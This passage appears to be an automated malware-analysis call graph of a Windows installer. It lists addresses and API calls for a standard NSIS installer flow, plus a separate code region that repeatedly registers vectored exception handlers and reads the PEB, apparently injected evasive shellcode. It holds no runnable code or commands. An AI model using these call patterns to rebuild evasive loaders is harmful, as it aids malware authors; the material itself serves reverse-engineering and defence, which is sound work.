7191 40550c 7186->7191 7195 4054c0 7187->7195 7215 405381 7187->7215 7228 404ed4 7187->7228 7194 405064 7189->7194 7196 4052cd SendMessageW 7190->7196 7190->7212 7192->7187 7197 40533f GlobalFree 7192->7197 7193->7192 7198 40513f GetWindowLongW SetWindowLongW 7194->7198 7204 40513a 7194->7204 7207 4050b7 SendMessageW 7194->7207 7209 4050f5 SendMessageW 7194->7209 7210 405109 SendMessageW 7194->7210 7200 4054d2 ShowWindow GetDlgItem ShowWindow 7195->7200 7195->7212 7203 4052e0 7196->7203 7197->7187 7199 405158 7198->7199 7201 405175 7199->7201 7202 40515d ShowWindow 7199->7202 7200->7212 7222 4044ce SendMessageW 7201->7222 7221 4044ce SendMessageW 7202->7221 7208 4052f1 SendMessageW 7203->7208 7204->7198 7204->7199 7207->7194 7208->7179 7209->7194 7210->7194 7212->7186 7213 40548b 7214 405496 InvalidateRect 7213->7214 7217 4054a2 7213->7217 7214->7217 7216 4053af SendMessageW 7215->7216 7219 4053c5 7215->7219 7216->7219 7217->7195 7237 404e0f 7217->7237 7218 405439 SendMessageW SendMessageW 7218->7219 7219->7213 7219->7218 7221->7212 7222->7176 7224 404eb3 SendMessageW 7223->7224 7225 404e77 GetMessagePos ScreenToClient SendMessageW 7223->7225 7227 404eab 7224->7227 7226 404eb0 7225->7226 7225->7227 7226->7224 7227->7184 7240 40653d lstrcpynW 7228->7240 7230 404ee7 7241 406484 wsprintfW 7230->7241 7232 404ef1 7233 40140b 2 API calls 7232->7233 7234 404efa 7233->7234 7242 40653d lstrcpynW 7234->7242 7236 404f01 7236->7215 7243 404d46 7237->7243 7239 404e24 7239->7195 7240->7230 7241->7232 7242->7236 7244 404d5f 7243->7244 7245 40657a 17 API calls 7244->7245 7246 404dc3 7245->7246 7247 40657a 17 API calls 7246->7247 7248 404dce 7247->7248 7249 40657a 17 API calls 7248->7249 7250 404de4 lstrlenW wsprintfW SetDlgItemTextW 7249->7250 7250->7239 7251 2a53fe2 7256 2a53ee9 7251->7256 7252 2a57564 4 API calls 7252->7256 7253 2a54bd0 2 API calls 7253->7256 7254 2a50903 7255 2a5812b RtlAddVectoredExceptionHandler 7255->7256 7256->7252 7256->7253 7256->7254 7256->7255 7257 2a54b2b 7256->7257 7259 2a5425b 7256->7259 7258 2a5812b RtlAddVectoredExceptionHandler 7257->7258 7260 2a54b3c 7258->7260 7261 2a54f3f 2 API calls 7259->7261 7262 2a5812b RtlAddVectoredExceptionHandler 7260->7262 7263 2a5427a 7261->7263 7264 2a54b4a 7262->7264 7266 2a56a18 7263->7266 7268 2a5812b RtlAddVectoredExceptionHandler 7263->7268 7265 2a5812b RtlAddVectoredExceptionHandler 7264->7265 7267 2a54b80 7265->7267 7271 2a56cd9 GetPEB 7266->7271 7273 2a56a96 7266->7273 7269 2a5812b RtlAddVectoredExceptionHandler 7267->7269 7270 2a54497 7268->7270 7272 2a54bb8 7269->7272 7270->7257 7274 2a5096b 7270->7274 7275 2a5812b RtlAddVectoredExceptionHandler 7270->7275 7271->7273 7276 2a545b5 7275->7276 7276->7257 7277 2a5812b RtlAddVectoredExceptionHandler 7276->7277 7278 2a54749 7277->7278 7278->7257 7278->7266 7279 2a549eb 7278->7279 7280 2a5812b RtlAddVectoredExceptionHandler 7279->7280 7281 2a54a2b 7280->7281 7281->7257 7282 2a5812b RtlAddVectoredExceptionHandler 7281->7282 7283 2a54a96 7282->7283 7283->7257 7284 2a54ac6 7283->7284 7285 2a5812b RtlAddVectoredExceptionHandler 7284->7285 7286 2a54afc 7285->7286 7287 2a5812b RtlAddVectoredExceptionHandler 7286->7287 7288 2a54b2a 7287->7288 6585 404609 lstrlenW 6586 404628 6585->6586 6587 40462a WideCharToMultiByte 6585->6587 6586->6587 7289 2a537ec GetPEB 7290 2a53789 7289->7290 7291 40290b 7292 402da6 17 API calls 7291->7292 7293 402912 FindFirstFileW 7292->7293 7294 40293a 7293->7294 7298 402925 7293->7298 7296 402943 7294->7296 7299 406484 wsprintfW 7294->7299 7300 40653d lstrcpynW 7296->7300 7299->7296 7300->7298 7301 40190c 7302 401943 7301->7302 7303 402da6 17 API calls 7302->7303 7304 401948 7303->7304 7305 405c49 67 API calls 7304->7305 7306 401951 7305->7306 7307 40190f 7308 402da6 17 API calls 7307->7308 7309 401916 7308->7309 7310 405b9d MessageBoxIndirectW 7309->7310 7311 40191f 7310->7311 7312 2a55ff5 7313 2a55694 2 API calls 7312->7313 7314 2a56034 7313->7314 7315 2a56a18 GetPEB 7314->7315 7316 2a56042 7315->7316 7317 2a56a18 GetPEB 7316->7317 7318 2a56055 7317->7318 7319 2a50df7 7320 2a5812b RtlAddVectoredExceptionHandler 7319->7320 7321 2a50e27 7320->7321 7322 401f12 7323 402da6 17 API calls 7322->7323 7324 401f18 7323->7324 7325 402da6 17 API calls 7324->7325 7326 401f21 7325->7326 7327 402da6 17 API calls 7326->7327 7328 401f2a 7327->7328 7329 402da6 17 API calls 7328->7329 7330 401f33 7329->7330 7331 401423 24 API calls 7330->7331 7332 401f3a 7331->7332 7339 405b63 ShellExecuteExW 7332->7339 7334 401f82 7337 40292e 7334->7337 7340 4069b5 WaitForSingleObject 7334->7340 7336 401f9f CloseHandle 7336->7337 7339->7334 7342 4069cf 7340->7342 7341 4069e1 GetExitCodeProcess 7341->7336 7342->7341 7343 406946 2 API calls 7342->7343 7344 4069d6 WaitForSingleObject 7343->7344 7344->7342 7345 405513 7346 405523 7345->7346 7347 405537 7345->7347 7348 405580 7346->7348 7349 405529 7346->7349 7350 40553f IsWindowVisible 7347->7350 7356 405556 7347->7356 7351 405585 CallWindowProcW 7348->7351 7352 4044e5 SendMessageW 7349->7352 7350->7348 7353 40554c 7350->7353 7354 405533 7351->7354 7352->7354 7355 404e54 5 API calls 7353->7355 7355->7356 7356->7351 7357 404ed4 4 API calls 7356->7357 7357->7348 6588 73201774 6589 732017a3 6588->6589 6590 73201bff 22 API calls 6589->6590 6591 732017aa 6590->6591 6592 732017b1 6591->6592 6593 732017bd 6591->6593 6594 73201312 2 API calls 6592->6594 6595 732017e4 6593->6595 6596 732017c7 6593->6596 6599 732017bb 6594->6599 6597 732017ea 6595->6597 6598 7320180e 6595->6598 6600 732015dd 3 API calls 6596->6600 6601 73201654 3 API calls 6597->6601 6602 732015dd 3 API calls 6598->6602 6603 732017cc 6600->6603 6604 732017ef 6601->6604 6602->6599 6605 73201654 3 API calls 6603->6605 6606 73201312 2 API calls 6604->6606 6607 732017d2 6605->6607 6608 732017f5 GlobalFree 6606->6608 6609 73201312 2 API calls 6607->6609 6608->6599 6610 73201809 GlobalFree 6608->6610 6611 732017d8 GlobalFree 6609->6611 6610->6599 6611->6599 7358 401d17 7359 402d84 17 API calls 7358->7359 7360 401d1d IsWindow 7359->7360 7361 401a20 7360->7361 6612 73201979 6613 7320199c 6612->6613 6614 732019d1 GlobalFree 6613->6614 6615 732019e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6613->6615 6614->6615 6616 73201312 2 API calls 6615->6616 6617 73201b6e GlobalFree GlobalFree 6616->6617 6618 40261c 6619 402da6 17 API calls 6618->6619 6620 402623 6619->6620 6623 40602d GetFileAttributesW CreateFileW 6620->6623 6622 40262f 6623->6622 6417 73202a7f 6418 73202acf 6417->6418 6419 73202a8f VirtualProtect 6417->6419 6419->6418 6624 73202d43 6625 73202d5b 6624->6625 6626 7320162f 2 API calls 6625->6626 6627 73202d76 6626->6627 7362 2a501cd 7363 2a55694 2 API calls 7362->7363 7364 2a501fe 7363->7364 7365 2a56a18 GetPEB 7364->7365 7366 2a50212 7365->7366 7367 2a56a18 GetPEB 7366->7367 7368 2a50224 7367->7368 7369 2a50234 RtlAddVectoredExceptionHandler 7368->7369 7372 2a56a18 7368->7372 7369->7372 7370 2a56cd9 GetPEB 7371 2a56a96 7370->7371 7372->7370 7372->7371 6628 40202a 6629 402da6 17 API calls 6628->6629 6630 402031 6629->6630 6631 40690a 5 API calls 6630->6631 6632 402040 6631->6632 6633 40205c GlobalAlloc 6632->6633 6635 4020cc 6632->6635 6634 402070 6633->6634 6633->6635 6636 40690a 5 API calls 6634->6636 6637 402077 6636->6637 6638 40690a 5 API calls 6637->6638 6639 402081 6638->6639 6639->6635 6643 406484 wsprintfW 6639->6643 6641 4020ba 6644 406484 wsprintfW 6641->6644 6643->6641 6644->6635 7373 40252a 7374 402de6 17 API calls 7373->7374 7375 402534 7374->7375 7376 402da6 17 API calls 7375->7376 7377 40253d 7376->7377 7378 402548 RegQueryValueExW 7377->7378 7383 40292e 7377->7383 7379 402568 7378->7379 7380 40256e RegCloseKey 7378->7380 7379->7380 7384 406484 wsprintfW 7379->7384 7380->7383 7384->7380 5716 40352d SetErrorMode GetVersionExW 5717 4035b7 5716->5717 5718 40357f GetVersionExW 5716->5718 5719 403610 5717->5719 5720 40690a 5 API calls 5717->5720 5718->5717 5721 40689a 3 API calls 5719->5721 5720->5719 5722 403626 lstrlenA 5721->5722 5722->5719 5723 403636 5722->5723 5724 40690a 5 API calls 5723->5724 5725 40363d 5724->5725 5726 40690a 5 API calls 5725->5726 5727 403644 5726->5727 5728 40690a 5 API calls 5727->5728 5729 403650 #17 OleInitialize SHGetFileInfoW 5728->5729 5807 40653d lstrcpynW 5729->5807 5732 40369d GetCommandLineW 5808 40653d lstrcpynW 5732->5808 5734 4036af 5735 405e39 CharNextW 5734->5735 5736 4036d5 CharNextW 5735->5736 5745 4036e6 5736->5745 5737 4037e4 5738 4037f8 GetTempPathW 5737->5738 5809 4034fc 5738->5809 5740 403810 5742 403814 GetWindowsDirectoryW lstrcatW 5740->5742 5743 40386a DeleteFileW 5740->5743 5741 405e39 CharNextW 5741->5745 5746 4034fc 12 API calls 5742->5746 5819 40307d GetTickCount GetModuleFileNameW 5743->5819 5745->5737 5745->5741 5750 4037e6 5745->5750 5747 403830 5746->5747 5747->5743 5749 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5747->5749 5748 403941 5911 403b12 5748->5911 5755 4034fc 12 API calls 5749->5755 5903 40653d lstrcpynW 5750->5903 5751 40387d 5751->5748 5752 403932 5751->5752 5757 405e39 CharNextW 5751->5757 5847 403bec 5752->5847 5756 403862 5755->5756 5756->5743 5756->5748 5772 40389f 5757->5772 5760 403a69 5918 405b9d 5760->5918 5761 403a7e 5762 403a86 GetCurrentProcess OpenProcessToken 5761->5762 5763 403afc ExitProcess 5761->5763 5765 403acc 5762->5765 5766 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 5762->5766 5771 40690a 5 API calls 5765->5771 5766->5765 5768 403908 5774 405f14 18 API calls 5768->5774 5769 403949 5773 405b08 5 API calls 5769->5773 5776 403ad3 5771->5776 5772->5768 5772->5769 5777 40394e lstrcatW 5773->5777 5775 403914 5774->5775 5775->5748 5904 40653d lstrcpynW 5775->5904 5778 403ae8 ExitWindowsEx 5776->5778 5782 403af5 5776->5782 5779 40396a lstrcatW lstrcmpiW 5777->5779 5780 40395f lstrcatW 5777->5780 5778->5763 5778->5782 5779->5748 5783 40398a 5779->5783 5780->5779 5922 40140b 5782->5922 5786 403996 5783->5786 5787 40398f 5783->5787 5784 403927 5905 40653d lstrcpynW 5784->5905 5789 405aeb 2 API calls 5786->5789 5788 405a6e 4 API calls 5787->5788 5791 403994 5788->5791 5792 40399b SetCurrentDirectoryW 5789->5792 5791->5792 5793 4039b8 5792->5793 5794 4039ad 5792->5794 5907 40653d lstrcpynW 5793->5907 5906 40653d lstrcpynW 5794->5906 5797 40657a 17 API calls 5798 4039fa DeleteFileW 5797->5798 5799 403a06 CopyFileW 5798->5799 5804 4039c5 5798->5804 5799->5804 5800 403a50 5801 4062fd 36 API calls 5800->5801 5801->5748 5802 4062fd 36 API calls 5802->5804 5803 40657a 17 API calls 5803->5804 5804->5797 5804->5800 5804->5802 5804->5803 5806 403a3a CloseHandle 5804->5806 5908 405b20 CreateProcessW 5804->5908 5806->5804 5807->5732 5808->5734 5810 4067c4 5 API calls 5809->5810 5812 403508 5810->5812 5811 403512 5811->5740 5812->5811 5813 405e0c 3 API calls 5812->5813 5814 40351a 5813->5814 5815 405aeb 2 API calls 5814->5815 5816 403520 5815->5816 5925 40605c 5816->5925 5929 40602d GetFileAttributesW CreateFileW 5819->5929 5821 4030bd 5840 4030cd 5821->5840 5930 40653d lstrcpynW 5821->5930 5823 4030e3 5824 405e58 2 API calls 5823->5824 5825 4030e9 5824->5825 5931 40653d lstrcpynW 5825->5931 5827 4030f4 GetFileSize 5828 4031ee 5827->5828 5846 40310b 5827->5846 5932 403019 5828->5932 5830 4031f7 5832 403227 GlobalAlloc 5830->5832 5830->5840 5967 4034e5 SetFilePointer 5830->5967 5943 4034e5 SetFilePointer 5832->5943 5833 40325a 5837 403019 6 API calls 5833->5837 5836 403242 5944 4032b4 5836->5944 5837->5840 5838 403210 5841 4034cf ReadFile 5838->5841 5840->5751 5843 40321b 5841->5843 5842 403019 6 API calls 5842->5846 5843->5832 5843->5840 5844 40324e 5844->5840 5844->5844 5845 40328b SetFilePointer 5844->5845 5845->5840 5846->5828 5846->5833 5846->5840 5846->5842 5964 4034cf 5846->5964 5848 40690a 5 API calls 5847->5848 5849 403c00 5848->5849 5850 403c06 5849->5850 5851 403c18 5849->5851 5988 406484 wsprintfW 5850->5988 5852 40640b 3 API calls 5851->5852 5853 403c48 5852->5853 5855 403c67 lstrcatW 5853->5855 5857 40640b 3 API calls 5853->5857 5856 403c16 5855->5856 5973 403ec2 5856->5973 5857->5855 5860 405f14 18 API calls 5861 403c99 5860->5861 5862 403d2d 5861->5862 5864 40640b 3 API calls 5861->5864 5863 405f14 18 API calls 5862->5863 5867 403d33 5863->5867 5865 403ccb 5864->5865 5865->5862 5872 403cec lstrlenW 5865->5872 5875 405e39 CharNextW 5865->5875 5866 403d43 LoadImageW 5869 403de9 5866->5869 5870 403d6a RegisterClassW 5866->5870 5867->5866 5868 40657a 17 API calls 5867->5868 5868->5866 5871 40140b 2 API calls 5869->5871 5873 403da0 SystemParametersInfoW CreateWindowExW 5870->5873 5902 403df3 5870->5902 5874 403def 5871->5874 5876 403d20 5872->5876 5877 403cfa lstrcmpiW 5872->5877 5873->5869 5882 403ec2 18 API calls 5874->5882 5874->5902 5879 403ce9 5875->5879 5878 405e0c 3 API calls 5876->5878 5877->5876 5880 403d0a GetFileAttributesW 5877->5880 5883 403d26 5878->5883 5879->5872 5881 403d16 5880->5881 5881->5876 5884 405e58 2 API calls 5881->5884 5885 403e00 5882->5885 5989 40653d lstrcpynW 5883->5989 5884->5876 5887 403e0c ShowWindow 5885->5887 5888 403e8f 5885->5888 5890 40689a 3 API calls 5887->5890 5981 405672 OleInitialize 5888->5981 5892 403e24 5890->5892 5891 403e95 5893 403eb1 5891->5893 5894 403e99 5891->5894 5895 403e32 GetClassInfoW 5892->5895 5897 40689a 3 API calls 5892->5897 5896 40140b 2 API calls 5893->5896 5900 40140b 2 API calls 5894->5900 5894->5902 5898 403e46 GetClassInfoW RegisterClassW 5895->5898 5899 403e5c DialogBoxParamW 5895->5899 5896->5902 5897->5895 5898->5899 5901 40140b 2 API calls 5899->5901 5900->5902 5901->5902 5902->5748 5903->5738 5904->5784 5905->5752 5906->5793 5907->5804 5909 405b53 CloseHandle 5908->5909 5910 405b5f 5908->5910 5909->5910 5910->5804 5912 403b2a 5911->5912 5913 403b1c CloseHandle 5911->5913 6001 403b57 5912->6001 5913->5912 5916 405c49 67 API calls 5917 403a5e OleUninitialize 5916->5917 5917->5760 5917->5761 5920 405bb2 5918->5920 5919 403a76 ExitProcess 5920->5919 5921 405bc6 MessageBoxIndirectW 5920->5921 5921->5919 5923 401389 2 API calls 5922->5923 5924 401420 5923->5924 5924->5763 5926 406069 GetTickCount GetTempFileNameW 5925->5926 5927 40352b 5926->5927 5928 40609f 5926->5928 5927->5740 5928->5926 5928->5927 5929->5821 5930->5823 5931->5827 5933 403022 5932->5933 5934 40303a 5932->5934 5935 403032 5933->5935 5936 40302b DestroyWindow 5933->5936 5937 403042 5934->5937 5938 40304a GetTickCount 5934->5938 5935->5830 5936->5935 5968 406946 5937->5968 5940 403058 CreateDialogParamW ShowWindow 5938->5940 5941 40307b 5938->5941 5940->5941 5941->5830 5943->5836 5945 4032cd 5944->5945 5946 4032fb 5945->5946 5972 4034e5 SetFilePointer 5945->5972 5948 4034cf ReadFile 5946->5948 5949 403306 5948->5949 5950 403468 5949->5950 5951 403318 GetTickCount 5949->5951 5955 403452 5949->5955 5952 4034aa 5950->5952 5957 40346c 5950->5957 5951->5955 5963 403367 5951->5963 5953 4034cf ReadFile 5952->5953 5953->5955 5954 4034cf ReadFile 5954->5963 5955->5844 5956 4034cf ReadFile 5956->5957 5957->5955 5957->5956 5958 4060df WriteFile 5957->5958 5958->5957 5959 4033bd GetTickCount 5959->5963 5960 4033e2 MulDiv wsprintfW 5961 40559f 24 API calls 5960->5961 5961->5963 5962 4060df WriteFile 5962->5963 5963->5954 5963->5955 5963->5959 5963->5960 5963->5962 5965 4060b0 ReadFile 5964->5965 5966 4034e2 5965->5966 5966->5846 5967->5838 5969 406963 PeekMessageW 5968->5969 5970 403048 5969->5970 5971 406959 DispatchMessageW 5969->5971 5970->5830 5971->5969 5972->5946 5974 403ed6 5973->5974 5990 406484 wsprintfW 5974->5990 5976 403f47 5991 403f7b 5976->5991 5978 403c77 5978->5860 5979 403f4c 5979->5978 5980 40657a 17 API calls 5979->5980 5980->5979 5994 4044e5 5981->5994 5983 4056bc 5984 4044e5 SendMessageW 5983->5984 5985 4056ce OleUninitialize 5984->5985 5985->5891 5986 405695 5986->5983 5997 401389 5986->5997 5988->5856 5989->5862 5990->5976 5992 40657a 17 API calls 5991->5992 5993 403f89 SetWindowTextW 5992->5993 5993->5979 5995 4044fd 5994->5995 5996 4044ee SendMessageW 5994->5996 5995->5986 5996->5995 5999 401390 5997->5999 5998 4013fe 5998->5986 5999->5998 6000 4013cb MulDiv SendMessageW 5999->6000 6000->5999 6002 403b65 6001->6002 6003 403b2f 6002->6003 6004 403b6a FreeLibrary GlobalFree 6002->6004 6003->5916 6004->6003 6004->6004 6645 401a30 6646 402da6 17 API calls 6645->6646 6647 401a39 ExpandEnvironmentStringsW 6646->6647 6648 401a4d 6647->6648 6650 401a60 6647->6650 6649 401a52 lstrcmpW 6648->6649 6648->6650 6649->6650 6651 402434 6652 402467 6651->6652 6653 40243c 6651->6653 6655 402da6 17 API calls 6652->6655 6662 402de6 6653->6662 6657 40246e 6655->6657 6667 402e64 6657->6667 6659 402da6 17 API calls 6661 402454 RegDeleteValueW RegCloseKey 6659->6661 6660 40247b 6661->6660 6663 402da6 17 API calls 6662->6663 6664 402dfd 6663->6664 6665 4063aa RegOpenKeyExW 6664->6665 6666 402443 6665->6666 6666->6659 6666->6660 6668 402e71 6667->6668 6669 402e78 6667->6669 6668->6660 6669->6668 6671 402ea9 6669->6671 6672 4063aa RegOpenKeyExW 6671->6672 6673 402ed7 6672->6673 6674 402ee7 RegEnumValueW 6673->6674 6681 402f81 6673->6681 6683 402f0a 6673->6683 6675 402f71 RegCloseKey 6674->6675 6674->6683 6675->6681 6676 402f46 RegEnumKeyW 6677 402f4f RegCloseKey 6676->6677 6676->6683 6678 40690a 5 API calls 6677->6678 6680 402f5f 6678->6680 6679 402ea9 6 API calls 6679->6683 6680->6681 6682 402f63 RegDeleteKeyW 6680->6682 6681->6668 6682->6681 6683->6675 6683->6676 6683->6677 6683->6679 7385 401735 7386 402da6 17 API calls 7385->7386 7387 40173c SearchPathW 7386->7387 7388 401757 7387->7388 7389 401d38 7390 402d84 17 API calls 7389->7390 7391 401d3f 7390->7391 7392 402d84 17 API calls 7391->7392 7393 401d4b GetDlgItem 7392->7393 7394 402638 7393->7394 7395 73201058 7397 73201074 7395->7397 7396 732010dd 7397->7396 7398 732015b6 GlobalFree 7397->7398 7399 73201092 7397->7399 7398->7399 7400 732015b6 GlobalFree 7399->7400 7401 732010a2 7400->7401 7402 732010b2 7401->7402 7403 732010a9 GlobalSize 7401->7403 7404 732010b6 GlobalAlloc 7402->7404 7405 732010c7 7402->7405 7403->7402 7406 732015dd 3 API calls 7404->7406 7407 732010d2 GlobalFree 7405->7407 7406->7405 7407->7396 6688 40263e 6689 402652 6688->6689 6690 40266d 6688->6690 6691 402d84 17 API calls 6689->6691 6692 402672 6690->6692 6693 40269d 6690->6693 6702 402659 6691->6702 6695 402da6 17 API calls 6692->6695 6694 402da6 17 API calls 6693->6694 6696 4026a4 lstrlenW 6694->6696 6697 402679 6695->6697 6696->6702 6705 40655f WideCharToMultiByte 6697->6705 6699 40268d lstrlenA 6699->6702 6700 4026d1 6701 4026e7 6700->6701 6703 4060df WriteFile 6700->6703 6702->6700 6702->6701 6706 40610e SetFilePointer 6702->6706 6703->6701 6705->6699 6707 40612a 6706->6707 6714 406142 6706->6714 6708 4060b0 ReadFile 6707->6708 6709 406136 6708->6709 6710 406173 SetFilePointer 6709->6710 6711 40614b SetFilePointer 6709->6711 6709->6714 6710->6714 6711->6710 6712 406156 6711->6712 6713 4060df WriteFile 6712->6713 6713->6714 6714->6700 6715 2a54eda 6716 2a55694 2 API calls 6715->6716 6719 2a53ee9 6716->6719 6720 2a50903 6719->6720 6722 2a54b2b 6719->6722 6724 2a5425b 6719->6724 6754 2a57564 6719->6754 6795 2a54bd0 6719->6795 6805 2a5812b 6719->6805 6723 2a5812b RtlAddVectoredExceptionHandler 6722->6723 6725 2a54b3c 6723->6725 6807 2a54f3f 6724->6807 6727 2a5812b RtlAddVectoredExceptionHandler 6725->6727 6728 2a54b4a 6727->6728 6729 2a5812b RtlAddVectoredExceptionHandler 6728->6729 6732 2a54b80 6729->6732 6734 2a5812b RtlAddVectoredExceptionHandler 6732->6734 6737 2a54bb8 6734->6737 6755 2a56a18 GetPEB 6754->6755 6756 2a5757a 6755->6756 6757 2a56a18 GetPEB 6756->6757 6758 2a5758d GetPEB 6757->6758 6765 2a53ee9 6758->6765 6759 2a56a18 6760 2a56cd9 GetPEB 6759->6760 6761 2a56a96 6759->6761 6760->6761 6761->6719 6762 2a57564 3 API calls 6762->6765 6763 2a50903 6763->6719 6764 2a54bd0 2 API calls 6764->6765 6765->6759 6765->6762 6765->6763 6765->6764 6766 2a5812b RtlAddVectoredExceptionHandler 6765->6766 6767 2a54b2b 6765->6767 6769 2a5425b 6765->6769 6766->6765 6768 2a5812b RtlAddVectoredExceptionHandler 6767->6768 6770 2a54b3c 6768->6770 6771 2a54f3f 2 API calls 6769->6771 6772 2a5812b RtlAddVectoredExceptionHandler 6770->6772 6775 2a5427a 6771->6775 6773 2a54b4a 6772->6773 6774 2a5812b RtlAddVectoredExceptionHandler 6773->6774 6776 2a54b80 6774->6776 6775->6759 6777 2a5812b RtlAddVectoredExceptionHandler 6775->6777 6778 2a5812b RtlAddVectoredExceptionHandler 6776->6778 6779 2a54497 6777->6779 6780 2a54bb8 6778->6780 6779->6763 6779->6767 6781 2a5812b RtlAddVectoredExceptionHandler 6779->6781 6780->6719 6782 2a545b5 6781->6782 6782->6767 6783 2a5812b RtlAddVectoredExceptionHandler 6782->6783 6784 2a54749 6783->6784 6784->6759 6784->6767 6785 2a549eb 6784->6785 6786 2a5812b RtlAddVectoredExceptionHandler 6785->6786 6787 2a54a2b 6786->6787 6787->6767 6788 2a5812b RtlAddVectoredExceptionHandler 6787->6788 6789 2a54a96 6788->6789 6789->6767 6790 2a54ac6 6789->6790 6791 2a5812b RtlAddVectoredExceptionHandler 6790->6791 6792 2a54afc 6791->6792 6793 2a5812b RtlAddVectoredExceptionHandler 6792->6793 6794 2a54b2a 6793->6794 6794->6719 6796 2a564be 6795->6796 6797 2a5591c 2 API calls 6796->6797 6798 2a564dd 6797->6798 6799 2a55005 2 API calls 6798->6799 6800 2a564f8 6799->6800 6801 2a54f5d 2 API calls 6800->6801 6802 2a56517 6801->6802 6803 2a54fb6 2 API calls 6802->6803 6804 2a56534 6803->6804 6806 2a58130 RtlAddVectoredExceptionHandler 6805->6806 6814 2a567a6 6807->6814 6809 2a54f52 6810 2a54faf 6809->6810 6811 2a54f5d 2 API calls 6809->6811 6812 2a54fb6 2 API calls 6810->6812 6811->6810 6813 2a56534 6812->6813 6817 2a567ce 6814->6817 6815 2a56cd9 GetPEB 6816 2a56a96 6815->6816 6816->6809 6817->6809 6817->6815 6817->6816 5659 4015c1 5660 402da6 17 API calls 5659->5660 5661 4015c8 5660->5661 5662 405eb7 4 API calls 5661->5662 5667 4015d1 5662->5667 5663 401631 5665 401663 5663->5665 5666 401636 5663->5666 5664 405e39 CharNextW 5664->5667 5670 401423 24 API calls 5665->5670 5686 401423 5666->5686 5667->5663 5667->5664 5676 401617 GetFileAttributesW 5667->5676 5678 405b08 5667->5678 5681 405a6e CreateDirectoryW 5667->5681 5690 405aeb CreateDirectoryW 5667->5690 5675 40165b 5670->5675 5674 40164a SetCurrentDirectoryW 5674->5675 5676->5667 5693 40690a GetModuleHandleA 5678->5693 5682 405abb 5681->5682 5683 405abf GetLastError 5681->5683 5682->5667 5683->5682 5684 405ace SetFileSecurityW 5683->5684 5684->5682 5685 405ae4 GetLastError 5684->5685 5685->5682 5687 40559f 24 API calls 5686->5687 5688 401431 5687->5688 5689 40653d lstrcpynW 5688->5689 5689->5674 5691 405afb 5690->5691 5692 405aff GetLastError 5690->5692 5691->5667 5692->5691 5694 406930 GetProcAddress 5693->5694 5695 406926 5693->5695 5697 405b0f 5694->5697 5699 40689a GetSystemDirectoryW 5695->5699 5697->5667 5698 40692c 5698->5694 5698->5697 5700 4068bc wsprintfW LoadLibraryExW 5699->5700 5700->5698 6818 4028c4 6819 4028ca 6818->6819 6820 4028d2 FindClose 6819->6820 6821 402c2a 6819->6821 6820->6821 6825 4016cc 6826 402da6 17 API calls 6825->6826 6827 4016d2 GetFullPathNameW 6826->6827 6828 4016ec 6827->6828 6834 40170e 6827->6834 6831 406873 2 API calls 6828->6831 6828->6834 6829 401723 GetShortPathNameW 6830 402c2a 6829->6830 6832 4016fe 6831->6832 6832->6834 6835 40653d lstrcpynW 6832->6835 6834->6829 6834->6830 6835->6834 6005 2a5812b 6007 2a58130 6005->6007 6008 2a5815e 6007->6008 6009 2a5816d RtlAddVectoredExceptionHandler 6008->6009 6010 2a58183 6009->6010 6010->6010 7408 4045cf lstrcpynW lstrlenW 6836 4014d7 6837 402d84 17 API calls 6836->6837 6838 4014dd Sleep 6837->6838 6840 402c2a 6838->6840 6061 4020d8 6062 40219c 6061->6062 6063 4020ea 6061->6063 6065 401423 24 API calls 6062->6065 6064 402da6 17 API calls 6063->6064 6066 4020f1 6064->6066 6072 4022f6 6065->6072 6067 402da6 17 API calls 6066->6067 6068 4020fa 6067->6068 6069 402110 LoadLibraryExW 6068->6069 6070 402102 GetModuleHandleW 6068->6070 6069->6062 6071 402121 6069->6071 6070->6069 6070->6071 6084 406979 6071->6084 6075 402132 6077 402151 6075->6077 6078 40213a 6075->6078 6076 40216b 6079 40559f 24 API calls 6076->6079 6089 73201817 6077->6089 6080 401423 24 API calls 6078->6080 6081 402142 6079->6081 6080->6081 6081->6072 6082 40218e FreeLibrary 6081->6082 6082->6072 6131 40655f WideCharToMultiByte 6084->6131 6086 406996 6087 40699d GetProcAddress 6086->6087 6088 40212c 6086->6088 6087->6088 6088->6075 6088->6076 6090 7320184a 6089->6090 6132 73201bff 6090->6132 6092 73201851 6093 73201976 6092->6093 6094 73201862 6092->6094 6095 73201869 6092->6095 6093->6081 6182 7320243e 6094->6182 6166 73202480 6095->6166 6100 7320188e 6103 732018cd 6100->6103 6104 732018af 6100->6104 6101 73201898 6101->6100 6192 73202e23 6101->6192 6102 7320187f 6106 73201885 6102->6106 6110 73201890 6102->6110 6107 732018d3 6103->6107 6108 7320191e 6103->6108 6195 73202655 6104->6195 6106->6100 6176 73202b98 6106->6176 6213 73201666 6107->6213 6114 73202655 9 API calls 6108->6114 6109 732018b5 6205 73201654 6109->6205 6186 73202810 6110->6186 6118 7320190f 6114->6118 6122 73201965 6118->6122 6219 73202618 6118->6219 6120 73201896 6120->6100 6121 73202655 9 API calls 6121->6118 6122->6093 6126 7320196f GlobalFree 6122->6126 6126->6093 6128 73201951 6128->6122 6223 732015dd wsprintfW 6128->6223 6129 7320194a FreeLibrary 6129->6128 6131->6086 6226 732012bb GlobalAlloc 6132->6226 6134 73201c26 6227 732012bb GlobalAlloc 6134->6227 6136 73201e6b GlobalFree GlobalFree GlobalFree 6137 73201e88 6136->6137 6155 73201ed2 6136->6155 6138 7320227e 6137->6138 6147 73201e9d 6137->6147 6137->6155 6140 732022a0 GetModuleHandleW 6138->6140 6138->6155 6139 73201d26 GlobalAlloc 6151 73201c31 6139->6151 6143 732022b1 LoadLibraryW 6140->6143 6144 732022c6 6140->6144 6141 73201d71 lstrcpyW 6146 73201d7b lstrcpyW 6141->6146 6142 73201d8f GlobalFree 6142->6151 6143->6144 6143->6155 6234 732016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6144->6234 6146->6151 6147->6155 6230 732012cc 6147->6230 6148 73202318 6150 73202325 lstrlenW 6148->6150 6148->6155 6149 73202126 6233 732012bb GlobalAlloc 6149->6233 6235 732016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6150->6235 6151->6136 6151->6139 6151->6141 6151->6142 6151->6146 6151->6149 6154 732021ae 6151->6154 6151->6155 6158 73202067 GlobalFree 6151->6158 6160 732012cc 2 API calls 6151->6160 6161 73201dcd 6151->6161 6154->6155 6162 73202216 lstrcpyW 6154->6162 6155->6092 6156 732022d8 6156->6148 6164 73202302 GetProcAddress 6156->6164 6158->6151 6159 